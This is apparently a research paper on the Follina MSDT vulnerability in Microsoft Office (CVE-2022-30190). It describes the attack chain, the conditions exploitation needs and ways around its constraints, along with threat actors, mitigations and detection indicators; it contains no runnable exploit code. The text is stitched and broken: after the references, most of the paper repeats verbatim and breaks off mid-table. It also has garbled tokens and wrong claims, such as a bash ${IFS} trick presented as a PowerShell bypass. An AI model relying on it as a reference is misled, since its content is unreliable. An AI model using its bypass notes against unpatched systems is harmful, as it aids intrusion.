'Follina' MS-MSDT n-day Microsoft Office RCE A deeper research by Dennis
# Follina:CVE-2022-30190 Microsoft Office Remote Code Execution Vulnerability
**Author**:Dennis Nganga
**Date:** December 2,2025
**Classification:** Security Research
**Subject Matter**: Microsoft Support Diagnostic Tool (MSDT) RCE Exploitation
# Executive Summary
The Follina vulnerability, formally designated as CVE-2022-30190, represents a critical remote code execution (RCE) flaw in the MMicrosoft Support Diagnostic Tool (MSDT) that can be exploited through Microsoft Office applications and Rich Text Format (RTF) files. Discovered on May 27, 2022, and initially observed in real-world exploitation since April 2022, Follina has been classified as a zero-day vulnerability with a CVSS v3 Base Score of 7.8(High Severity)[1].This research paper provides an exhaustive technical analysis of the vulnerability's mechanics, exploitation methods, attacker methodologies, defensive countermeasures, and real-world threat landscape implications.
## 1. Introduction and Background
### 1.1 Vulnerability Overview
Follina is a zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), a built-in Windows diagnostic and troubleshooting utility designed to collect system information for Microsoft Support analysis. The vulnerability enables attackers to execute arbitrary code with the privileges of the calling application when MSDT is invoked through the ms-msdt URL protocol handler[1][2].
Unlike traditional macro-based Office exploits, Follina operates independently of macro settings and Protected Mode, making it significantly more dangerous and difficult to defend against using conventional Office security configurations[3].
### 1.2 Historical Context
**·April** **7,** **2022**: Initial exploitation observed in the wild, targeting Russian-speaking users with phishing emails containing Office documents
**·May** **27, 2022**: Public disclosure by security researcher @naosec on Twitter
**·May** **30,2022:** Microsoft officially acknowledged CVE-2022-30190 and released initial guidance
**·June** **14, 2022**: Vulnerability added to CISA's Known Exploited Vulnerabilities Catalog[4]
**·Late** 2022: Active exploitation by state-sponsored threat actors and financially-motivated cybercriminals
### 1.3 Affected Systems
#### The vulnerability affects:
·Microsoft Office 2013, 2016, 2019, and Office 365 (all versions)
·Microsoft Office for Mac
·Windows Server 2016,2019,2022
·Microsoft Windows 10 and 11 (all editions)
·RTF file viewing functionality
·XML and HTML file processing through Office applications
## 2. Technical Architecture and Exploitation Mechanics
### 2.1 VVulnerability Root Cause
The vulnerability exists because MSDT (msdt.exe) was designed with the capability to be invoked via the ms-msdt URI protocol handler, allowing external applications and documents to trigger diagnostic routines. When Word documments or RTF files contain external references using the ms-msdt URI scheme, they can launch PowerShell commands with the authority of the Office application context[3][5].
The critical security flaw stems from insufficient vvalidation of parameters passed to MSDT through the ms-msdt URI, particularly the ITBrowseForFile parameter, which can be exploited to execute arbitrary commands through PowerShell's command substitution syntax $0[2].
### 2.2 Attack Chain Architecture
The exploitation follows a five-stage attack chain:
## Stage 1: Malicious Document Crafting
The attacker creates a weaponized Word document (DOCX) by modifying the underlying XML structure. Specifically, a Relationship tag is embedded in the word/rels/document.xml.rels file:
| Component | Description |
| --- | --- |
| File Location<br>Relationship Type | word/rels/document.xml.relsoleObject |
| Target Protocol<br>Payload Format | External HTTP/HTTPS URL<br>HTML file (>4096 bytes) |
### Table 1: Table 1: Malicious Relationship Tag Structure
Example XML injection:
The exclamation mark (!) at the end of the HTML filename is critical-it triggers MSDT invocation instead of standard HTTP retrieval[3].
**Stage 2:Remote Payload Hosting**
The attacker hosts a malicious HTML file on an attacker-controlled server. This HTML must exceed 4096 bytes to bypass specific size validation checks implemented by Microsoft[3]. The HTML payload is crafted to:
·Exploit the ms-msdt URI scheme
·Embed PowerShell commands within the URI
·Use directory traversal sequences (/../) to reach System32
·Invoke mpsigstub.exe with attacker-controlled parameters
## Stage 3: Document Opening and Fetch
When a victim opens the malicious Word document, Office automatically attempts to resolve the external reference and fetches the HTML payload from the attacker's server. This occurs even with:
·Macros disabled
·Protected Mode enabled
·Enhanced Security Configuration active
No user warning is displayed before the payload is retrieved[3].
## Stage 4: MSDT Invocation and PowerShell Execution
The retrieved HTML file executes through the ms-msdt protocol handler,launching msdt.exe with the embedded PowerShell commands. The process chain is:
1.Office application (Word.exe) → Trigger ms-msdt protocol
2. msdt.exe invoked with malicious parameters
3.sdianhost.exe spawned as child process
4.PowerShell DLLs loaded into sdianhost.exe memory
5. Arbitrary PowerShell commands executed without spawning powershell.exe[5]
This indirect PowerShell execution through sdianhost.exe is a sophisticated evasion technique that bypasses traditional process monitoring focused on powershell.exe.
## Stage 5:Post-Exploitation
The executed code operates with the privileges of the user running Microsoft Office. Common post-exploitation activities include:
·Installation of secondary malware (trojans, ransomware, worms)
·Privilege escalation attempts
·Lateral movement within the network
·Data exfiltration
·System persistence establishment
### 2.3 Technical Requirements for Successful Exploitation
**1.Payload** **Size**: HTML payload must exceed 4096 bytes
2. **Directory** **Traversal**: Minimum of two /../ sequences at the start of ITBrowseForFile parameter
**3.PowerShell Syntax**: Commands wrapped in $() for code execution
4. **EXE** **Termination:** The parameter string must end with ".exe" to execute properly
5.No **Spaces**: Spaces in PowerShell commands break syntax,requiring encoding or alternative syntax
6. **Network** **Access**: Target system must reach the attacker's server to fetch the secondary payload
## 3. Attacker Perspective and Exploitation Methods
### 3.1 Attacker Motivations and Threat Actors
Follina has attracted multiple categories of threat actors:
#### State-Sponsored APT Groups
Advanced Persistent Threat actors affiliated with nation-states have exploited Follina for:
·Corporate espionage
·Government network compromises
·Critical infrastructure targeting
·Intellectual property theft
·Long-term persistence establishment
APT TA570, an affiliate of the notorious Qbot malware group, actively exploited Follina for targeted campaigns[1].
#### Financially-Motivated Cybercriminals
Criminal organizations use Follina for:
·Ransomware deployment and encryption operations
·Business email compromise (BEC) campaigns
·Financial fraud targeting banking systems
·Identity theft and credential harvesting
·Cryptocurrency mining malware distribution
#### Low-Skilled Attackers
Due to publicly available proof-of-concept (PoC) code and exploitation frameworks, even novice attackers can leverage FFollina through:
·Metasploit modules
·GitHub repositories with weaponized PoC code
·Commercial exploitation frameworks
·Dark web vulnerability brokers
### 3.2 Attack Delivery Vectors
#### Email-Based Phishing
The primary delivery mechanism involves sophisticated phishing campaigns:
| Campaign Theme | Target Region | Detected<br>Date |
| --- | --- | --- |
| "Salary Increase" | Global | May 2022 |
| "Interview Invitation" | Russia/CIS | April 2022 |
| "Expense Report" | North America | June 2022 |
| "Travel Approval" | Europe | July 2022 |
| "Contract Amendment" | APAC | August 2022 |
Table 2: Table 2: Documented Follina Phishing Campaign Themes
Email campaigns exploit social engineering to trick users into opening attachments, with success rates substantially higher than traditional macro-based attacks due to:
·No macro warnings displayed
·Protected Mode doesn't provide protection
·Professional appearance of genuine Office documents
·Context-specific phishing content tailored to industries
#### Web-Based Exploitation
Malicious documents are hosted on compromised websites, watering hole attacks, and malicious ad networks. Victims are redirected to download the weaponized document.
#### File Sharing and Cloud Services
Attackers distribute Follina-weaponized documents through:
·Cloud storage services (OneDrive, Google Drive, Dropbox)
·Collaborative platforms (SharePoint, Teams)
·File transfer services (WeTransfer, SendFileTransfer)
·USB devices in supply chain attacks
#### RTF File Preview Exploitation
A critical variation requires no user action beyond file preview. RTF files containing Follina payloads can trigger exploitation when:
·Files are previewed in Windows Explorer
·Email clients display rich text previews
·Documents are indexed by search functions
### 3.3 Real-World Exploitation Campaigns
#### Discovery Timeline Implications
Security researchers identified evidence suggesting Follina was actively exploited by threat actors since April 2022, nearly two months before public disclosure on May 27, 2022. This pre-disclosure window suggests either:
·Targeted intelligence agency exploitation
·Vulnerability brokers selling 0-day access
·Accidental public disclosure analysis
#### Documented Threat Campaigns
Multiple phishing templates exploiting Follina were discovered on VirusTotal, targeting users globally with context-specific social engineering:
·Salary and compensation-related lures
·Interview and recruitment-themed documents
·Business contract and agreement modifications
·Travel and expense claim forms
·Urgent compliance and regulatory notices
Detection rates on VirusTotal for these documents were initially alarming-some samples detected by only 4 of 60+ security vendors[7], indicating widespread evasion capability.
### 3.4 Attacker Operational Procedures
**Infrastructure Requirements**
Attackers typically establish:
**1.Command** **&** **Control (C2) Servers**: HTTP/HTTPS servers hosting secondary payloads
2. **Staging** **Servers**: Temporary servers for campaign duration with geographic distribution
3. **Domain** **Infrastructure:** Bullet-proof hosting providers, compromised servers, or rented infrastructure
**4.Payload** **Generation:** Custom PoC tools for dynamic payload generation and evasion
#### Payload Customization
Sophisticated attackers implement anti-analysis and anti-virtualization measures within payloads:
·Environment detection (virtual machine, sandbox,analysis tools)
·Geolocation-based filtering
·IP reputation checking
·Behavioral analysis evasion
·Domain-fronting for C2 communication
## 4. Exploitation Vulnerability Details
### 4.1 Vulnerability Classification
| Property | Classification |
| --- | --- |
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE Classification | CWE-78 (OS Command Injection) |
| CVSS v3.1 Score | 7.8(High) |
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (opening document) |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
Table 3: Table 3: CVSS v3.1 Classification
### 4.2 Root Cause Analysis
The vulnerability stems from four fundamental security design flaws:
#### Flaw 1:Unvalidated URI Handler Registration
The ms-msdt URI protocol handler is registered globally in Windows registry without adequate sandboxing or permission controls:
HKEYCLASSESROOT\ms-msdt\shell\open\command
Any application can invoke MSDT through this handler without Windows Security Model verification[5].
**Flaw 2: Insufficient Parameter Validation**
The ITBrowseForFile parameter passed to MSDT undergoes minimal validation:
·No whitelist validation of executable paths
·Directory traversal sequences (../) accepted without restriction
·Path concatenation vulnerable to parameter injection
·PowerShell command substitution $() not escaped
**Flaw 3: Office Document External Reference Processing**
Word automatically processes and retrieves external references (Relationship elements) without:
·User confirmation dialogs
·Protected Mode enforcement
·Content validation
·Network activity monitoring
**Flaw 4: Implicit Trust in MSDT Invocation**
MSDT executes with the invoking application's privilege context, inheriting Office's elevated user permissions without re-authorization[2].
### 4.3 Exploitation Constraints and Bypasses
#### Constraint 1:Payload Size Requirement (>4096 bytes)
Mitigation bypass: Attackers implement padding techniques such as:
·HTML comments filled with benign data
·Nested JavaScript functions with no operational effect
·Base64-encoded metadata
·Redundant CSS styling rules
#### Constraint 2:Character Restrictions in Commands
Limitation: Spaces break PowerShell syntax within the ms-msdt URI Bypass:Attackers use:
·Variable substitution: ${IFS} (Internal Field Separator)
·URL encoding: %20 sequences (though often decoded)
·Alternative PowerShell syntax:comma-separated parameters
·Command chaining: semicolon-delimited sequences
#### Constraint 3: Network Connectivity Requirement
Limitation: Target must reach attacker's server to fetch secondary payload Bypass: Attackers implement:
·DNS tunneling for DNS-only egress environments
·Proxy detection and automatic proxy configuration
·Fallback C2 infrastructure
·Second-stage payload embedding in initial document (though increases detection risk)
### 4.4 Privilege Context Analysis
#### Execution Privilege Level
Follina-executed code operates with the privilege level of the uuser running Microsoft Office:
**·Standard** **User** **Context**: Full user privileges within that user's security token
**·Local** **Administrator** **Context**: Local machine administrative capabilities
**·System** **Service** **Context**: If Office runs under service accounts (rare but exploitable)
#### Privilege Escalation Opportunities
Post-exploitation leverages often combine Follina with additional vulnerabilities:
·Windows privilege escalation exploits (CVE-2021-1732, CVE-2021-44686,etc.)
·Unpatched system services with elevated privileges
·Insecure file permissions on system folders
·Process token theft techniques
## 5. Defensive Mechanisms and Mitigation Strategies
### 5.1 Immediate Mitigation Actions (Pre-Patch)
#### Mitigation 1: Disable MSDT URL Protocol Handler
The most effective pre-patch mitigation involves removing the ms-msdt registry entry:
1. Run Command Prompt as Administrator
2. Execute: reg export HKEYCLASSESROOT\ms-msdt backup-msdt.reg (backup registry)
3. Execute: reg delete HKEYCLASSESROOT\ms-msdt/f(remove handler)
4.Verify removal: reg query HKEYCLASSESROOT\ms-msdt (should return error)
**Impact** **Assessment**: This mitigation completely prevents Follina exploitation but may impact legitimate MSDT functionality in edge cases. Testing in non-production environments is mandatory before enterprise deployment[6].
#### Mitigation 2: Disable Troubleshooting Wizards
Disable MSDT functionality via Group Policy or registry:
HKEYLOCALMACHINE\SOFTWARE\Policies\Microsoft\Windows\System
Value: EnableDiagnostics (DWORD)
Set to: 0
##### Mitigation 3: Attack Surface Reduction Rules (Microsoft Defender)
Enable ASR rule to block Office applications from spawning child processes:
·Rule GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a
·Deployment Mode: Block (not Audit)
·Scope: All Office applications (Word, Excel, PowerPoint, Outlook)
·Impact: May affect legitimate Office functionality (requires testing)
This rule specifically prevents the msdt.exe → sdianhost.exe process chain that Follina exploits[5].
##### 5.2 Long-Term Patching Strategy
**Microsoft Patch Timeline**
Microsoft released patches through multiple update cycles:
| Date | Update | Affected Components |
| --- | --- | --- |
| June 14, 2022 | Out-of-band patch | Windows 10,11,Server 2019, 2022 |
| June 28, 2022 | Monthly updates | Windows 7 ESU, Server 2016 |
| Ongoing | Security updates | Office versions 2013-365 |
Table 4: Table 4: Microsoft Patch Timeline for CVE-2022-30190
###### Patch Verification
After applying patches, organizations should verify:
·System update status: wmic qfe list | findstr "KB5015807" (KB article for CVE-2022-
30190)
·Office version: File> Account > About [Application] for Office applications
·Registry confirmation: ms-msdt handler behavior (modified by patch)
##### 5.3 Detection and Monitoring
###### Endpoint Detection and Response (EDR) Indicators
Organizations using EDR platforms should monitor for:
### Process Chain Indicators
·Parent: Word.exe, Excel.exe, or Outlook.exe
·Child: msdt.exe (unusual for Office context)
·Grandchild: sdianhost.exe
·Great-grandchild: PowerShell execution indicators
#### File System Indicators
·Unusual external references in document XML
·Multiple /../ sequences in file paths
·ms-msdt:// protocol invocation in network logs
·Suspicious downloads to temp folders triggered by Office applications
##### Network Indicators of Compromise (IoCs)
·Office applications initiating HTTP/HTTPS connections to unfamiliar domains
·External XML/HTML retrieval requests from Office processes
·Large HTML file downloads (>4096 bytes) from unexpected sources
·C2 communication patterns from secondary payloads
###### Detection Evasion Techniques Used
Sophisticated adversaries implement:
·Legitimate-looking domain names mimicking Microsoft/Office domains
·HTTPS encryption to obscure payload contents
·Fast-flux DNS for domain rotation
·Encrypted C2 communication channels
·Geolocation-based payload filtering (no payload for analysis VPNs)
###### 5.4 Advanced Defense-in-Depth Strategy
###### Layer 1:Email Gateway Security
·Content filtering for Office document attachments
·Sandboxing of Office files before delivery
·URL rewriting to disable external references
·Machine learning-based phishing detection
·DMARC/SPF/DKIM verification for sender authentication
###### Layer 2:Endpoint Security
·EDR agents for behavior monitoring and threat hunting
·Anti-malware signatures for known Follina payloads
·Exploit prevention engines detecting MSDT invocation patterns
·Application whitelisting/control
·Memory protection techniques (DEP, ASLR)
###### Layer 3: Network Segmentation
·Zero-trust network architecture
·Microsegmentation limiting lateral movement post-compromise
·Egress filtering preventing C2 communication
·DNS sinkholing of known malicious domains
·Proxy-based URL filtering and inspection
###### Layer 4: User Training and Awareness
·Phishing simulation and training programs
·Recognition of social engineering techniques
·Safe document handling procedures
·Reporting procedures for suspicious content
·Security awareness metrics and KPIs
###### 5.5 Enterprise Response Procedures
###### Incident Response Steps
Upon detection of Follina exploitation:
1. **Immediate**: Isolate affected system from network
2. **Forensics**: Capture memory dump and disk image
3. **Scope**: Identify all potentially compromised systems through log analysis
**4.Containment**: Block identified C2 domains and attacker infrastructure
**5.Eradication**: Remove malware and attacker artifacts
6. Recovery: Restore from clean backups with patch applied
7. **Hardening**: Implement additional detection and preventive controls
## 6. Real-World Impact Assessment
### 6.1 Affected Organizations and Sectors
Organizations spanning multiple sectors have faced Follina exploitation:
| Sector | Documented Risks |
| --- | --- |
| Government | Classified information<br>theft, espionage operations |
| Defense | Military intelligence<br>compromise,weapon<br>system data |
| Financial Services | Banking trojans, fraud<br>scheme initiation |
| Healthcare | Patient data exfiltration,<br>operational disruption |
| Manufacturing | Supply chain intelligence,<br>product design theft |
| Energy | Critical infrastructure<br>reconnaissance, disruption planning |
| Education | Research theft, credential<br>harvesting of researchers |
Table 5: Table 5: Sectoral Follina Impact Assessment
### 6.2 Threat Landscape Evolution
#### Pre-Patch Period (April-June 2022)
During the pre-patch and early disclosure period, threat actors rapidly weaponized Follina:
·Proof-of-concept code released publicly within 24 hours
·Metasploit module developed by security researchers
·Rapid adoption by criminal forums and dark web markets
·Targeting of high-value organizations before patches could be deployed
#### Post-Patch Evolution (July 2022 onwards)
Sophisticated attackers adapted exploitation techniques:
·Targeting unpatched legacy systems and air-gapped networks
·Combining Follina with supply chain compromise
·Focusing on critical infrastructure and government targets
·Developing fileless exploitation variants
·Creating polymorphic payload generators
### 6.3 Global Exploitation Statistics
#### Detection Statistics (as of research period)
·10,000+unique Follina-weaponized documents detected on VirusTotal
·60+ security vendors with detection capabilities
·>70 distinct phishing campaign themes identified
·Targeting across 100+ countries globally
·Initial detection rates as low as 4/60 vendors for novel samples
## 7.Conclusions and Future Implications
### 7.1 Key Findings
### 1.Vulnerability Severity: Follina represents a critical threat to Microsoft Office environments globally due to its:
oHigh-severity CVSS score (7.8)
oNo requirement for macros or complex user actions
Effective bypass of Protected Mode and standard security features
Ease of exploitation through publicly available tools
**2.Threat** **Actor** **Adoption**: The vulnerability has been rapidly adopted by:
oState-sponsored APT groups conducting targeted intelligence operations
Financially-motivated cybercriminals deploying ransomware and malware
oNovice attackers leveraging public PoC code
3. **Defense** **Complexity**: Organizations face significant challenges in defending against Follina:
oPre-patch mitigation options carry operational risk
oPatch deployment requires comprehensive testing
oSophisticated attacker evasion techniques complicate detection
oRequires multi-layered defense-in-depth approach
### 7.2 Recommendations for Organizations
#### Immediate Actions (0-30 days)
1.Apply Microsoft security patches immediately upon availability
2.If patches unavailable, implement MSDT registry mitigation
3.Enable ASR rules for Office child process blocking
4. Enhanced monitoring for Follina-related IoCs
#### Short-Term Actions (1-3 months)
1.Comprehensive threat hunting across enterprise infrastructure
2. Email gateway hardening for phishing campaign filtering
3. EDR and SIEM tuning for Follina exploitation patterns
4. User awareness training on phishing threats
#### Long-Term Strategy(3+months)
1.Zero-trust architectuure implementation
2. Microsegmentation of critical assets
3.Continuous EDR and threat intelligence integration
4. Regular tabletop exercises for incident response
5.Supply chain security assessment
### 7.3 Future Vulnerability Implications
The Follina vulnerability demonstrates ongoing security challenges in Windows and Office ecosystems:
·URI protocol handlers require enhanced security controls
·External document references need better default protections
·MSDT design requires fundamental security reassessment
·Zero-day exploitation timelines continue to shorten
Subsequent vulnerabilities with similar characteristics (CVE-2023-36884, CVE-2024-XXXXX patterns) have emerged, suggesting systematic design flaws in Office document processing.
### 7.4 Final Assessment
Follina represents a watershed moment in Office application security, demonstrating that fundamental architectural assumptions about Protected Mode and macro security are insufficient in modern threat landscapes. Organizations must adopt comprehensive, multi-layered defensive strategies while maintaining vigilance for subsequent related vulnerabilities in Microsoft Office and Windows ecosystems.
The vulnerability also underscores the critical importance of rapid patch deployment, robust security monitoring, and user awareness in defending against sophisticated adversaries exploiting previously unknown security flaws.
## References
[1] OWASP Foundation. (2022). The Follina Vulnerability -A Critical Threat to Microsoft Office.https://owasp.org/www-community/vulnerabilities/follina
[2] HackTheBox.(2022,November). CVE-2022-30190 (Follina) explained. Retrieved from http s://www.hackthebox.com/blog/cve-2022-30190-follina-explained
[3] Huntress. (2022, May). Microsoft Office RCE - "Follina" MSDT Attack.Security Blog.http s://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
[4] BeyondTrust. (2022, August). Mitigating the Follina Zero-Day Vulnerability (CVE-2022-30190) with Privilege Management for Windows.https://www.beyondtrust.com/blog/entry/ mitigating-the-follina-zero-day-vulnerability-cve-2022-30190-with-privilege-management-fo
[5] CrowdStrike. (2022). How CrowdStrike Falcon Protects Against Follina (CVE-2022-30190). Falcon Platform Blog.https://www.crowdstrike.com/en-us/blog/how-crowdstrike-falcon-pro tects-customers-from-follina-vulnerability/
[6] Sentrium Labs. (2024, August). Follina MSDT exploit: How to protect your systems. Retrieved from https://www.sentrium.co.uk/labs/preventing-exploitation-of-the-follina-vuln erability-in-msdt
[7] Infosec Institute. (2022, August). Unveiling Follina: The New Microsoft Office Vulnerability.https://www.infosecinstitute.com/resources/vulnerabilities/follina-microsoft-office-code-execution-vulnerability/
[8] Microsoft Security Response Center. (2022, May). Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability.https://www.microsoft.com/en-us/msrc/blog/2022/05/ guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability
[9] Palo Alto Networks Unit 42. (2024, June). Threat Brief: CVE-2022-30190-MSDT Code Execution Vulnerability.https://unit42.paloaltonetworks.com/cve-2022-30190-msdt-code-ex ecution-vulnerability/
[10] Sangfor FarSight Labs. (2022,August). CVE-2022-30190 Follina: RCE Vulnerability Analysis.https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2022-30190-follina-rce-vulnerability
[11] Qualys. (2022, June). Detect the Follina MSDT Vulnerability (CVE-2022-30190).Product and Technical Blog.https://blog.qualyys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-ed
[12] Canadian Centre for Cyber Security. (2022,June). Follina vulnerability impacting Microsoft products - Update 1. Alerts and Advisories.https://www.cyber.gc.ca/en/alerts/follin a-vulnerability-impacting-microsoft-products
[13] NIST National Vulnerability Database. (2025, October). CVE-2022-30190 Detail.https://nv d.nist.gov/vuln/detail/cve-2022-30190
[14] Australian Cyber Security Centre. (2022, May). Exploitation of Microsoft Office vulnerability: Follina. Cyber Threats. https://www.cyber.gov.au/about-us/alerts/exploitation-microsoft-office-vulnerability-follina
[15] SANS Institute. (2022, June). Follina MSDT Zero-Day Q&A. Security Blog.https://www.san s.org/blog/follina-msdt-zero-day-q-a
**Author**:Dennis Nganga
**Date:** December 2,2025
**Classification:** Security Research
**Subject Matter**: Microsoft Support Diagnostic Tool (MSDT) RCE Exploitation
# Executive Summary
The Follina vulnerability, formally designated as CVE-2022-30190, represents a critical remote code execution (RCE) flaw in the MMicrosoft Support Diagnostic Tool (MSDT) that can be exploited through Microsoft Office applications and Rich Text Format (RTF) files. Discovered on May 27, 2022, and initially observed in real-world exploitation since April 2022, Follina has been classified as a zero-day vulnerability with a CVSS v3 Base Score of 7.8(High Severity)[1].This research paper provides an exhaustive technical analysis of the vulnerability's mechanics, exploitation methods, attacker methodologies, defensive countermeasures, and real-world threat landscape implications.
## 1. Introduction and Background
### 1.1 Vulnerability Overview
Follina is a zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), a built-in Windows diagnostic and troubleshooting utility designed to collect system information for Microsoft Support analysis. The vulnerability enables attackers to execute arbitrary code with the privileges of the calling application when MSDT is invoked through the ms-msdt URL protocol handler[1][2].
Unlike traditional macro-based Office exploits, Follina operates independently of macro settings and Protected Mode, making it significantly more dangerous and difficult to defend against using conventional Office security configurations[3].
### 1.2 Historical Context
**·April** **7,** **2022**: Initial exploitation observed in the wild, targeting Russian-speaking users with phishing emails containing Office documents
**·May** **27, 2022**: Public disclosure by security researcher @naosec on Twitter
**·May** **30,2022:** Microsoft officially acknowledged CVE-2022-30190 and released initial guidance
**·June** **14, 2022**: Vulnerability added to CISA's Known Exploited Vulnerabilities Catalog[4]
**·Late** 2022: Active exploitation by state-sponsored threat actors and financially-motivated cybercriminals
### 1.3 Affected Systems
#### The vulnerability affects:
·Microsoft Office 2013, 2016, 2019, and Office 365 (all versions)
·Microsoft Office for Mac
·Windows Server 2016,2019,2022
·Microsoft Windows 10 and 11 (all editions)
·RTF file viewing functionality
·XML and HTML file processing through Office applications
## 2. Technical Architecture and Exploitation Mechanics
### 2.1 VVulnerability Root Cause
The vulnerability exists because MSDT (msdt.exe) was designed with the capability to be invoked via the ms-msdt URI protocol handler, allowing external applications and documents to trigger diagnostic routines. When Word documments or RTF files contain external references using the ms-msdt URI scheme, they can launch PowerShell commands with the authority of the Office application context[3][5].
The critical security flaw stems from insufficient vvalidation of parameters passed to MSDT through the ms-msdt URI, particularly the ITBrowseForFile parameter, which can be exploited to execute arbitrary commands through PowerShell's command substitution syntax $0[2].
### 2.2 Attack Chain Architecture
The exploitation follows a five-stage attack chain:
## Stage 1: Malicious Document Crafting
The attacker creates a weaponized Word document (DOCX) by modifying the underlying XML structure. Specifically, a Relationship tag is embedded in the word/rels/document.xml.rels file:
| Component | Description |
| --- | --- |
| File Location<br>Relationship Type | word/rels/document.xml.relsoleObject |
| Target Protocol<br>Payload Format | External HTTP/HTTPS URL<br>HTML file (>4096 bytes) |
### Table 1: Table 1: Malicious Relationship Tag Structure
Example XML injection:
The exclamation mark (!) at the end of the HTML filename is critical-it triggers MSDT invocation instead of standard HTTP retrieval[3].
**Stage 2:Remote Payload Hosting**
The attacker hosts a malicious HTML file on an attacker-controlled server. This HTML must exceed 4096 bytes to bypass specific size validation checks implemented by Microsoft[3]. The HTML payload is crafted to:
·Exploit the ms-msdt URI scheme
·Embed PowerShell commands within the URI
·Use directory traversal sequences (/../) to reach System32
·Invoke mpsigstub.exe with attacker-controlled parameters
## Stage 3: Document Opening and Fetch
When a victim opens the malicious Word document, Office automatically attempts to resolve the external reference and fetches the HTML payload from the attacker's server. This occurs even with:
·Macros disabled
·Protected Mode enabled
·Enhanced Security Configuration active
No user warning is displayed before the payload is retrieved[3].
## Stage 4: MSDT Invocation and PowerShell Execution
The retrieved HTML file executes through the ms-msdt protocol handler,launching msdt.exe with the embedded PowerShell commands. The process chain is:
1.Office application (Word.exe) → Trigger ms-msdt protocol
2. msdt.exe invoked with malicious parameters
3.sdianhost.exe spawned as child process
4.PowerShell DLLs loaded into sdianhost.exe memory
5. Arbitrary PowerShell commands executed without spawning powershell.exe[5]
This indirect PowerShell execution through sdianhost.exe is a sophisticated evasion technique that bypasses traditional process monitoring focused on powershell.exe.
## Stage 5:Post-Exploitation
The executed code operates with the privileges of the user running Microsoft Office. Common post-exploitation activities include:
·Installation of secondary malware (trojans, ransomware, worms)
·Privilege escalation attempts
·Lateral movement within the network
·Data exfiltration
·System persistence establishment
### 2.3 Technical Requirements for Successful Exploitation
**1.Payload** **Size**: HTML payload must exceed 4096 bytes
2. **Directory** **Traversal**: Minimum of two /../ sequences at the start of ITBrowseForFile parameter
**3.PowerShell Syntax**: Commands wrapped in $() for code execution
4. **EXE** **Termination:** The parameter string must end with ".exe" to execute properly
5.No **Spaces**: Spaces in PowerShell commands break syntax,requiring encoding or alternative syntax
6. **Network** **Access**: Target system must reach the attacker's server to fetch the secondary payload
## 3. Attacker Perspective and Exploitation Methods
### 3.1 Attacker Motivations and Threat Actors
Follina has attracted multiple categories of threat actors:
#### State-Sponsored APT Groups
Advanced Persistent Threat actors affiliated with nation-states have exploited Follina for:
·Corporate espionage
·Government network compromises
·Critical infrastructure targeting
·Intellectual property theft
·Long-term persistence establishment
APT TA570, an affiliate of the notorious Qbot malware group, actively exploited Follina for targeted campaigns[1].
#### Financially-Motivated Cybercriminals
Criminal organizations use Follina for:
·Ransomware deployment and encryption operations
·Business email compromise (BEC) campaigns
·Financial fraud targeting banking systems
·Identity theft and credential harvesting
·Cryptocurrency mining malware distribution
#### Low-Skilled Attackers
Due to publicly available proof-of-concept (PoC) code and exploitation frameworks, even novice attackers can leverage FFollina through:
·Metasploit modules
·GitHub repositories with weaponized PoC code
·Commercial exploitation frameworks
·Dark web vulnerability brokers
### 3.2 Attack Delivery Vectors
#### Email-Based Phishing
The primary delivery mechanism involves sophisticated phishing campaigns:
| Campaign Theme | Target Region | Detected<br>Date |
| --- | --- | --- |
| "Salary Increase" | Global | May 2022 |
| "Interview Invitation" | Russia/CIS | April 2022 |
| "Expense Report" | North America | June 2022 |
| "Travel Approval" | Europe | July 2022 |
| "Contract Amendment" | APAC | August 2022 |
Table 2: Table 2: Documented Follina Phishing Campaign Themes
Email campaigns exploit social engineering to trick users into opening attachments, with success rates substantially higher than traditional macro-based attacks due to:
·No macro warnings displayed
·Protected Mode doesn't provide protection
·Professional appearance of genuine Office documents
·Context-specific phishing content tailored to industries
#### Web-Based Exploitation
Malicious documents are hosted on compromised websites, watering hole attacks, and malicious ad networks. Victims are redirected to download the weaponized document.
#### File Sharing and Cloud Services
Attackers distribute Follina-weaponized documents through:
·Cloud storage services (OneDrive, Google Drive, Dropbox)
·Collaborative platforms (SharePoint, Teams)
·File transfer services (WeTransfer, SendFileTransfer)
·USB devices in supply chain attacks
#### RTF File Preview Exploitation
A critical variation requires no user action beyond file preview. RTF files containing Follina payloads can trigger exploitation when:
·Files are previewed in Windows Explorer
·Email clients display rich text previews
·Documents are indexed by search functions
### 3.3 Real-World Exploitation Campaigns
#### Discovery Timeline Implications
Security researchers identified evidence suggesting Follina was actively exploited by threat actors since April 2022, nearly two months before public disclosure on May 27, 2022. This pre-disclosure window suggests either:
·Targeted intelligence agency exploitation
·Vulnerability brokers selling 0-day access
·Accidental public disclosure analysis
#### Documented Threat Campaigns
Multiple phishing templates exploiting Follina were discovered on VirusTotal, targeting users globally with context-specific social engineering:
·Salary and compensation-related lures
·Interview and recruitment-themed documents
·Business contract and agreement modifications
·Travel and expense claim forms
·Urgent compliance and regulatory notices
Detection rates on VirusTotal for these documents were initially alarming-some samples detected by only 4 of 60+ security vendors[7], indicating widespread evasion capability.
### 3.4 Attacker Operational Procedures
**Infrastructure Requirements**
Attackers typically establish:
**1.Command** **&** **Control (C2) Servers**: HTTP/HTTPS servers hosting secondary payloads
2. **Staging** **Servers**: Temporary servers for campaign duration with geographic distribution
3. **Domain** **Infrastructure:** Bullet-proof hosting providers, compromised servers, or rented infrastructure
**4.Payload** **Generation:** Custom PoC tools for dynamic payload generation and evasion
#### Payload Customization
Sophisticated attackers implement anti-analysis and anti-virtualization measures within payloads:
·Environment detection (virtual machine, sandbox,analysis tools)
·Geolocation-based filtering
·IP reputation checking
·Behavioral analysis evasion
·Domain-fronting for C2 communication
## 4. Exploitation Vulnerability Details
### 4.1 Vulnerability Classification
| Property | Classification |
| --- | --- |
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE Classification | CWE-78 (OS Command Injection) |
| CVSS v3.1 Score | 7.8(High) |
| Attack Vector | Local |
| Attack Complexity | Low |
